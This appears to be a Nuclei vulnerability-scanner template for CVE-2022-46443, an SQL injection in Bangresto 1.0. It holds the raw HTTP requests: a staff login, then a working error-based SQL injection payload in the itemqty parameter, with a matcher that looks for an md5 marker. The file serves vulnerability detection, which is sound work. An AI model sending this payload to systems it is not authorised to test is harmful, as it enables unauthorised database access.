47 lines
1.3 KiB
YAML
47 lines
1.3 KiB
YAML
id: CVE-2022-46443
|
|
|
|
info:
|
|
name: Bangresto - SQL Injection
|
|
author: Harsh
|
|
severity: high
|
|
description: |
|
|
Bangresto 1.0 is vulnberable to SQL Injection via the itemqty%5B%5D parameter.
|
|
reference:
|
|
- https://yuyudhn.github.io/CVE-2022-46443/
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-46443
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.8
|
|
cve-id: CVE-2022-46443
|
|
cwe-id: CWE-89
|
|
metadata:
|
|
max-request: 2
|
|
verified: true
|
|
tags: cve,cve2022,bangresto,sqli
|
|
|
|
variables:
|
|
num: "999999999"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /bangresto-main/staff/process.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
username={{username}}&password={{password}}
|
|
|
|
- |
|
|
POST /bangresto-main/staff/insertorder.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded;
|
|
|
|
itemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5({{num}}),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen
|
|
|
|
cookie-reuse: true
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '{{md5({{num}})}}'
|